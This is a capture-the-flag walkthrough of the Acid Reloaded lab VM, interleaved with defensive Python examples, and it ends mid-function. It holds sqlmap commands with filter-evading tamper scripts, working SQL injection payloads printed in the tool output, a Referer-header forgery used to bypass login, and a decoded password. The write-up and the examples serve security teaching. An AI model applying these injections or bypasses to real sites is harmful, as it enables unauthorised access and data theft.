
Acid Reloaded Capture The Flag Walkthru

Posted in: Cyber Security, Hacking, Testing


Acid Reloaded is a boot2root Capture the Flag (CTF) hacking exercise, designed by Avinash Kumar Thapa. This is a walkthru of this CTF, created by Robert Winkel, including his thoughts at the time, his failures, and his successes.

Attack

Find the IP address:

root@kali:~# netdiscover -r 192.168.159.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts
 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -------------------------------------------------------------------------
 192.168.159.1   00:50:56:c0:00:01    01    060   VMWare, Inc.
 192.168.159.141 00:0c:29:b3:16:f6    01    060   VMware, Inc.
 192.168.159.254 00:50:56:fb:6d:d5    01    060   VMWare, Inc.

Find the services:

root@kali:~# nmap -sV -p- -T4 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 21:53 AEST
Nmap scan report for 192.168.159.141
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
33447/tcp filtered unknown
MAC Address: 00:0C:29:B3:16:F6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1596.40 seconds

Let’s check out what’s on SSH:

root@kali:~# ssh root@192.168.159.141
The authenticity of host '192.168.159.141 (192.168.159.141)' can't be established.
ECDSA key fingerprint is a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.159.141' (ECDSA) to the list of known hosts.

    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
root@192.168.159.141's password:

So there is probably port knocking going on. I’m guessing knock port 3, then 2, then 1, or maybe port 321, and then maybe port 33447 (or some other random port) will open? Let’s try:

root@kali:~# nmap -T4 --max-retries=0 -p3 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:36 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00024s latency).
PORT  STATE    SERVICE
3/tcp filtered compressnet
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

root@kali:~# nmap -T4 --max-retries=0 -p2 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:36 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00024s latency).
PORT  STATE    SERVICE
2/tcp filtered compressnet
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

root@kali:~# nmap -T4 --max-retries=0 -p1 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:37 AEST
Warning: 192.168.159.141 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.159.141
Host is up (0.00025s latency).
PORT  STATE    SERVICE
1/tcp filtered tcpmux
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds

root@kali:~# nmap -sV -p33447 -T4 192.168.159.141

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-02 22:37 AEST
Nmap scan report for 192.168.159.141
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:B3:16:F6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.41 seconds

So let’s see what’s on that web server:

[image 1]

Not much…

The source code of the page reveals nothing of interest. There is no robots.txt file.

Dirbuster finds the following directories:

[image 2]

Looking at /bin/ reveals the following page:

[image 3]

I tried some manual SQL injection attempts, but all failed. I tried using sqlmap, but that also failed to find any SQLi.

The source code indicates there are subdirectories of /bin/crack/, /bin/crack/css/, /bin/crack/js/, /bin/js/, and /bin/includes/. Dirbuster also finds /bin/styles/, but this is not readable, and /bin/dashboard.php, but this returns the message “You are not authorized to access this page. Please login”.

[image 4]

At this stage, there is a sec_session_id cookie for 192.168.158.141. The session cookie may be used for authorisation, but there is also the chance that it is not needed; instead, a Referer HTTP header may be used.

Looking at the source code for http://192.168.159.141:33447/bin/index.php, I see that includes/validation.php is called:

<form  action="includes/validation.php" method="post" name="login_form">
Email: <input type="text" placeholder="Email Address" name="email" maxlength="20" />
Password: <input type="password" placeholder="Password" name="password" id="password"/>
<input type="submit" value="Login" onclick="formhash(this.form, this.form.password);" />
</form>

Logically, logging in from http://192.168.159.141:33447/bin/index.php will then send me to http://192.168.159.141:33447/bin/includes/validation.php, and then I may be forwarded to http://192.168.159.141:33447/bin/dashboard.php. So I’ll reload http://192.168.159.141:33447/bin/dashboard.php, but intercept the traffic with a proxy, and modify the Referer HTTP header to http://192.168.159.141:33447/bin/includes/validation.php.
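Why the Referer trick works, as an added example that is not the CTF's own PHP: dashboard.php evidently grants access when the Referer header claims the visitor came from validation.php, and that header is entirely under the client's control. The Python below (request text, header names and the session table are all constructed here, and the two check functions are assumptions about the page's logic) parses a raw request and compares that weak check with the proper one, a server-side lookup of the sec_session_id cookie.

```python
"""Referer-based versus session-based access checks for dashboard.php.

Added example, not code from the CTF. Everything here (requests, cookie
names, the session store) is constructed to model the behaviour observed
in the walkthrough.
"""


def parse_request(raw: str) -> dict:
    """Parse an HTTP request head into method, path, headers and cookies.
    Header names are lower-cased; the Cookie header is split into a dict."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            key, val = part.strip().split("=", 1)
            cookies[key] = val
    return {"method": method, "path": path, "headers": headers, "cookies": cookies}


def referer_check(req: dict) -> bool:
    """The weak check (assumed): trust the browser's claim that it arrived
    from the login validator. Anyone with a proxy can set this header."""
    return req["headers"].get("referer", "").endswith("/bin/includes/validation.php")


def session_check(req: dict, sessions: dict) -> bool:
    """The proper check: the sec_session_id cookie must name a server-side
    session that was created by a successful login."""
    sid = req["cookies"].get("sec_session_id")
    return sid is not None and sessions.get(sid, {}).get("authenticated", False)


# Constructed server-side session table: only one session has logged in.
SESSIONS = {
    "a1b2c3d4": {"authenticated": True, "user": "someuser"},
    "ffffffff": {"authenticated": False},
}

# Constructed request: an anonymous session with a hand-edited Referer,
# which is exactly what the proxy step in the walkthrough produces.
FORGED_REQUEST = """GET /bin/dashboard.php HTTP/1.1
Host: 192.168.159.141:33447
Referer: http://192.168.159.141:33447/bin/includes/validation.php
Cookie: sec_session_id=ffffffff
"""

# Constructed request from a session that really did log in (no Referer).
GENUINE_REQUEST = """GET /bin/dashboard.php HTTP/1.1
Host: 192.168.159.141:33447
Cookie: sec_session_id=a1b2c3d4
"""


def compare(raw: str) -> tuple:
    """Return (referer_check result, session_check result) for one request."""
    req = parse_request(raw)
    return referer_check(req), session_check(req, SESSIONS)


if __name__ == "__main__":
    print("forged request :", compare(FORGED_REQUEST))   # (True, False)
    print("genuine request:", compare(GENUINE_REQUEST))  # (False, True)
```

The forged request passes the Referer check and fails the session check; the genuine one does the opposite. Referer is useful for CSRF heuristics and logging, never as the thing that decides whether someone is logged in.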

[image 5]

Excellent! Clicking on “Click” forwards to http://192.168.159.141:33447/bin/l33t_haxor.php:

[image 6]

The source code for this page reveals:

<img src='http://assets-s3.usmagazine.com/uploads/assets/articles/85688-success-kid-meme-kidney-sick-father/1429037342_success-kid-meme-lg.jpg'><a href="l33t_haxor.php?id=" style="text-decoration:none"></a>

On my first attempt, I guessed “id=1”. http://192.168.159.141:33447/bin/l33t_haxor.php?id=1 returns:

[image 7]

Actually, changing the id value to any value between 1 and 10 returns something similar, just with a different message. I looked at the source code for all of these pages, but found no additional information.

Adding a single quote to the end of any of the above URLs produces a nice MySQL error:

[image 8]

I made a few manual attempts to exploit the SQLi, but had no luck. However, the input http://192.168.159.145:33447/bin/l33t_haxor.php?id=1%20%22 produced the following:

[image 9]

Although I had a direct connection to the Internet, that image just wouldn’t display. Going to it directly produces a 404 error. As the image may be useful, I did a Google search for the image name (hacker_detected_wp_by_er0n22.jpg) which produced the following:

[image 10]

To me, this indicates that my SQLi attempt was detected, probably through some sort of pattern match.
I then tried sqlmap with no tamper scripts, but this produced no hits:

sqlmap -u "http://192.168.159.141:33447/bin/l33t_haxor.php?id=1*" --dbms=mysql

Assuming there is some sort of SQLi detection going on, I tried a bunch of sqlmap --tamper scripts to bypass the detection:

root@kali:~# sqlmap -u "http://192.168.159.141:33447/bin/l33t_haxor.php?id=1*%22" --dbms=mysql --threads=10 -p id --batch --tamper=space2comment,space2dash,space2hash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150823}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:54:16

[22:54:16] [INFO] loading tamper script 'space2comment'
[22:54:16] [INFO] loading tamper script 'space2dash'
[22:54:16] [INFO] loading tamper script 'space2hash'
[22:54:16] [WARNING] tamper script 'space2hash' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2mysqlblank'
[22:54:16] [WARNING] tamper script 'space2mysqlblank' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2mysqldash'
[22:54:16] [WARNING] tamper script 'space2mysqldash' is only meant to be run against MySQL
[22:54:16] [INFO] loading tamper script 'space2plus'
[22:54:16] [INFO] loading tamper script 'space2randomblank'
[22:54:16] [WARNING] using too many tamper scripts is usually not a good idea
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[22:54:16] [INFO] testing connection to the target URL
[22:54:16] [INFO] heuristics detected web page charset 'ascii'
[22:54:16] [INFO] testing if the target URL is stable
[22:54:17] [INFO] target URL is stable
[22:54:17] [INFO] testing if URI parameter '#1*' is dynamic
[22:54:17] [INFO] confirming that URI parameter '#1*' is dynamic
[22:54:17] [INFO] URI parameter '#1*' is dynamic
[22:54:17] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[22:54:17] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to XSS attacks
[22:54:17] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[22:54:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:54:18] [WARNING] reflective value(s) found and filtering out
[22:54:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:54:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[22:54:18] [INFO] URI parameter '#1*' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable 
[22:54:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:54:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:54:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:54:18] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[22:54:18] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[22:54:18] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[22:54:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[22:54:18] [INFO] URI parameter '#1*' is 'MySQL OR error-based - WHERE or HAVING clause' injectable 
[22:54:18] [INFO] testing 'MySQL inline queries'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[22:54:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:54:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[22:54:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:54:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[22:54:18] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[22:54:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[22:54:28] [INFO] URI parameter '#1*' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)' injectable 
[22:54:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:54:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:54:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:54:29] [INFO] target URL appears to be UNION injectable with 2 columns
[22:54:29] [INFO] URI parameter '#1*' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:54:29] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 148 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-1427') OR 8540=8540#"

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-6762') OR 1 GROUP BY CONCAT(0x7170707071,(SELECT (CASE WHEN (1204=1204) THEN 1 ELSE 0 END)),0x717a6a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#"

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=1') AND (SELECT * FROM (SELECT(SLEEP(5)))bwnh)#"

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: http://192.168.159.141:33447/bin/l33t_haxor.php?id=-1981') UNION ALL SELECT NULL,CONCAT(0x7170707071,0x417242476a5342594967,0x717a6a6b71)#"
---
[22:54:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[22:54:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[22:54:29] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.159.141'

[*] shutting down at 22:54:29
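The detection that fired on the double quote, and the space2* tamper scripts that walked past it, illustrate the general lesson: a keyword blacklist in front of a concatenated query is not a fix. The following added example (not code from the CTF; the blacklist regex, the table rows and the payload strings are constructed here, and SQLite with a "--" comment stands in for the box's MySQL and "#") rebuilds a small copy of the secure_login.word table and runs the same inputs through a naive detector, a concatenated query of the shape the sqlmap payloads imply, and a parameterised query.

```python
"""Pattern-matched SQLi detection versus parameterised queries.

Added example, not code from the CTF. The back end on the box is MySQL;
SQLite is used here only so the example runs offline.
"""
import re
import sqlite3

# Constructed subset of the 'word' table the walkthrough dumps.
ROWS = [
    (1, "The hacker community may be small ..."),
    (2, "Younger hackers are hard to classify ..."),
    (3, "Most hackers are young because young people tend to be adaptable ..."),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE word (id INTEGER PRIMARY KEY, description TEXT)")
    conn.executemany("INSERT INTO word VALUES (?, ?)", ROWS)
    return conn


# Constructed guess at the box's detector: SQL keywords delimited by
# whitespace, plus the double quote that triggered the image on the page.
BLACKLIST = re.compile(r"\s(or|and|union|select)\s|\"", re.IGNORECASE)


def blacklist_flags(value: str) -> bool:
    """True if the naive detector would show the 'hacker detected' page."""
    return BLACKLIST.search(value) is not None


def vulnerable_lookup(conn: sqlite3.Connection, value: str) -> list:
    """Concatenation with the quoting the sqlmap payloads imply: id=('...')."""
    sql = f"SELECT id, description FROM word WHERE id=('{value}')"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, value: str) -> list:
    """Bound parameter: the value is data and can never become SQL syntax."""
    return conn.execute(
        "SELECT id, description FROM word WHERE id=(?)", (value,)
    ).fetchall()


def run_cases() -> dict:
    """Run each input through the detector and both query styles."""
    conn = make_db()
    cases = {
        "normal": "1",
        # Boolean payload shaped like sqlmap's first finding on the page.
        "plain": "-1') OR 1=1 -- ",
        # The same payload after space2comment-style tampering.
        "tampered": "-1')/**/OR/**/1=1/**/--",
    }
    results = {}
    for name, value in cases.items():
        results[name] = {
            "flagged": blacklist_flags(value),
            "vulnerable_rows": len(vulnerable_lookup(conn, value)),
            "safe_rows": len(safe_lookup(conn, value)),
        }
    return results


if __name__ == "__main__":
    for name, r in run_cases().items():
        print(f"{name:9s} flagged={r['flagged']!s:5s} "
              f"concat={r['vulnerable_rows']} parameterised={r['safe_rows']}")
```

The plain payload is flagged but, had it reached the database, would have returned every row; the tampered form is not flagged and returns every row through the concatenated query. The parameterised query returns nothing for either, whether or not a detector is in front of it. Keep the detector for alerting if you like, but put the parameterised query in regardless.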

Adding a --dbs produces:

available databases [4]:                                                                      
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login

Adding a -D secure_login --dump produces:

Database: secure_login
Table: UB3R/strcpy.exe
[0 entries]
+----+------+
| id | Name |
+----+------+
+----+------+

Table: word
[10 entries]
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | Description                                                                                                                                                                                              |
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | The hacker community may be small, but it possesses the skills that are driving the global economies of the future.                                                                                      |
| 2  | Younger hackers are hard to classify. They're probably just as diverse as the old hackers are. We're all over the map.                                                                                   |
| 3  | Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.                                                                      |
| 4  | As a matter of fact, yeah, they were foolproof. The problem is that you don't have to protect yourself against fools. You have to protect yourself against people like me.                               |
| 5  | Never underestimate the determination of a kid who is time-rich and cash-poor.                                                                                                                           |
| 6  |  Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.                                                                     |
| 7  | What hackers do is figure out technology and experiment with it in ways many people never imagined. They also have a strong desire to share this information with others and to explain it to people who |
| 8  |  My actions constituted pure hacking that resulted in relatively trivial expenses for the companies involved, despite.                                                                                   |
| 9  |  Hacking is a art of thinking outside the box in order to challenge the normal behaviour of application created by developers.                                                                           |
| 10 | What is the difference between active recon and passive recon ????                                                                                                                                       |
+----+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Table: members
[0 entries]
+----+------+-------+----------+----------+
| id | salt | email | username | password |
+----+------+-------+----------+----------+
+----+------+-------+----------+----------+

Table: login_attempts
[10 entries]
+---------+------------+
| user_id | time       |
+---------+------------+
| 1       | 1385995353 |
| 1       | 1386011064 |
| 2       | 1438676747 |
| 2       | 1438676749 |
| 2       | 1438676784 |
| 3       | 1438682944 |
| 3       | 1438692301 |
| 2       | 1438698562 |
| 2       | 1438708687 |
| 4       | 1438852932 |
+---------+------------+

Hmm, not much use there. But the “UB3R/strcpy.exe” bit looks more like a file location than a table name. Sure enough, going to http://192.168.159.141:33447/UB3R/strcpy.exe in my browser allows me to download the strcpy.exe file. Now to see what it is:

root@kali:~# file strcpy.exe 
strcpy.exe: PDF document, version 1.5

Oh wow. Some pretty serious obfuscation there. Only uber hackers would guess that it isn’t really a .exe file *eyeroll*. So I change the file extension to .pdf and open the strcpy.pdf file:

[image 10]

So the PDF file only contains the above image. I don’t believe that for a second. There has to be more info in there somewhere. Maybe in PDF metadata, or the image EXIF data, or some sort of other information that isn’t being displayed. So now I look for it…

Running a “strings” on the strcpy.pdf produces the following:

%%EOFRar!
acid.txt
You are at right track.
Don't loose hope..
Good Luck :-)
Kind & Best Regards,
Acid
lol.jpg

Ooh, look at the “Rar!” bit. That’s the magic number for a RAR archive. Could this file be a chameleon? Two files joined together? Under this assumption, I look further:

root@kali:~# cp strcpy.pdf strcpy.rar
root@kali:~# unrar l strcpy.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Archive: strcpy.rar
Details: RAR 4, SFX

 Attributes      Size    Date   Time   Name
----------- ---------  -------- -----  ----
    ..A....        92  23-08-15 18:16  acid.txt    
    ..A....     60961  23-08-15 18:09  lol.jpg     
----------- ---------  -------- -----  ----
                61053                  2

After extracting the files, they appear as follows:

root@kali:~# cat acid.txt 
You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,

[image 11]

Well, both of the files look pretty useless at first glance. Maybe the image contains some interesting EXIF data? Using the EXIF viewer at http://regex.info/exif.cgi revealed no interesting information.

Running “strings” on lol.jpg produces:

Rar!
"ot 
Avinash.contact
r9lD
,~E|i
TMcX
\	'|!
k\w;
{{5WH
aG]p
Q%,i]
UR]7
@7W!
Rv<{p]]D
gswW
@ugt 
hint.txt
`You have found a contact. Now, go and grab the details :-)

Ah, another chameleon!
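Both chameleons (the PDF and the JPEG) fooled `file` for the same reason: it classifies by the signature at offset 0, and the RAR archive was simply appended after a genuine PDF or image. The "SFX" in the unrar listings is the other half of the story: unrar skips leading non-archive data as if it were a self-extractor stub, which is why renaming the file was enough. An added example (not code from the CTF; the sample blob, a JPEG header plus filler plus a RAR 4 marker, is constructed in memory) that scans every offset for well-known signatures and reports anything that is not at the start:

```python
"""Detecting archives appended to other files ("chameleon" files).

Added example, not code from the CTF. The signatures are the standard
offset-0 magic numbers; the sample file is constructed below.
"""

# Offset-0 signatures ("magic numbers") for the formats met on this box.
SIGNATURES = {
    b"%PDF-": "PDF",
    b"\xff\xd8\xff": "JPEG",
    b"Rar!\x1a\x07\x00": "RAR 4.x archive",
    b"Rar!\x1a\x07\x01\x00": "RAR 5.x archive",
    b"PK\x03\x04": "ZIP archive",
}


def declared_type(data: bytes) -> str:
    """What an offset-0 check (the `file` approach) calls this blob."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"


def embedded_signatures(data: bytes) -> list:
    """Return [(offset, name)] for every signature found after offset 0."""
    hits = []
    for magic, name in SIGNATURES.items():
        pos = data.find(magic, 1)
        while pos != -1:
            hits.append((pos, name))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def carve(data: bytes, offset: int) -> bytes:
    """Cut the embedded object out so it can be handed to the right parser."""
    return data[offset:]


def scan(data: bytes) -> dict:
    """Summarise a blob: declared type plus anything hiding after offset 0."""
    return {"declared": declared_type(data), "embedded": embedded_signatures(data)}


def build_sample() -> bytes:
    """Constructed stand-in for lol.jpg: JPEG header, filler, RAR 4 marker."""
    jpeg_head = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01"   # 12 bytes
    filler = bytes(range(256)) * 4                        # 1024 bytes, no magics
    rar_marker = b"Rar!\x1a\x07\x00"
    rar_stub = b"\x00" * 32                               # truncated archive body
    return jpeg_head + filler + rar_marker + rar_stub


if __name__ == "__main__":
    blob = build_sample()
    report = scan(blob)
    print("declared type:", report["declared"])
    for offset, name in report["embedded"]:
        print(f"embedded {name} at offset {offset} ({len(carve(blob, offset))} bytes)")
```

On the constructed blob this reports a JPEG with a RAR 4.x archive at offset 1036. For real uploads the same idea applies: validate content across the whole file, not just its first bytes, and treat a trailing archive signature in an image or document as a finding.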

root@kali:~# cp lol.jpg lol.rar
root@kali:~# unrar l lol.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal

Archive: lol.rar
Details: RAR 4, SFX

 Attributes      Size    Date   Time   Name
----------- ---------  -------- -----  ----
    ..A....      1662  23-08-15 17:10  Avinash.contact
    ..A....        62  23-08-15 17:11  hint.txt    
----------- ---------  -------- -----  ----
                 1724                  2

root@kali:~# unrar e lol.rar 

UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal


Extracting from lol.rar

Extracting  Avinash.contact                                           OK 
Extracting  hint.txt                                                  OK 
All OK

root@kali:~# cat hint.txt 
You have found a contact. Now, go and grab the details :-)

root@kali:~# cat Avinash.contact 
<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
	<c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate><c:Extended>AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=</c:Extended>
	<c:ContactIDCollection><c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value></c:ContactIDCollection><c:EmailAddressCollection><c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e"><c:Type>SMTP</c:Type><c:Address>acid.exploit@gmail.com</c:Address><c:LabelCollection><c:Label>Preferred</c:Label></c:LabelCollection></c:EmailAddress><c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/></c:EmailAddressCollection><c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2"><c:FormattedName>Avinash</c:FormattedName><c:GivenName>Avinash</c:GivenName></c:Name></c:NameCollection><c:PersonCollection><c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134"><c:FormattedName>Makke</c:FormattedName><c:LabelCollection><c:Label>wab:Spouse</c:Label></c:LabelCollection></c:Person></c:PersonCollection><c:PhotoCollection><c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72"><c:LabelCollection><c:Label>UserTile</c:Label></c:LabelCollection></c:Photo></c:PhotoCollection></c:contact>

There are a few interesting values in the extracted Avinash.contact file, which I had highlighted in red above: the c:Extended value “AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=”, the email address acid.exploit@gmail.com, and the spouse name “Makke”.

The “AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=” string looks like base64 encoding.

root@kali:~# echo "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=" | base64 -d 
□□NooB@123

There were a couple of unprintable characters at the start of “NooB@123”, but I am not sure what they are from. However, the “NooB@123” looks like a password to me. I assume “acid.exploit@gmail.com” is the associated username. I tried that email address in /bin/index.php, but it only allows enough characters to type “acid.exploit@gmail.c”. I tried using a proxy to bypass the length restriction, but the password wasn’t accepted.
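The leading garbage is explained by looking at the decoded bytes rather than the terminal rendering. An added example (not part of the original walkthrough) that hex-dumps the value and decodes it: the 26 bytes are two little-endian 32-bit integers (1, then 18) followed by 18 bytes of UTF-16LE text with a NUL terminator. Most terminals draw 0x01 and 0x12 as boxes and nothing at all for the NUL bytes, so the UTF-16 text read as plain "NooB@123". The layout used here is read off this one value and is an interpretation, not a documented schema for the c:Extended element.

```python
"""Decoding the c:Extended value from Avinash.contact.

Added example, not code from the CTF. The field layout (u32, u32 byte
length, UTF-16LE NUL-terminated text) is an interpretation of this value.
"""
import base64
import struct

EXTENDED_B64 = "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA="  # value from the contact file


def hexdump(data: bytes, width: int = 16) -> str:
    """Classic offset / hex / ASCII view, so the NUL bytes become visible."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3}} |{asc}|")
    return "\n".join(lines)


def decode_extended(b64: str) -> dict:
    """Split the blob into its leading integers and the UTF-16LE string.

    Raises ValueError if the declared length does not fit the data, which
    is the check you want before trusting any length-prefixed field."""
    raw = base64.b64decode(b64)
    if len(raw) < 8:
        raise ValueError("too short for the two leading u32 fields")
    tag, length = struct.unpack_from("<II", raw, 0)
    payload = raw[8:8 + length]
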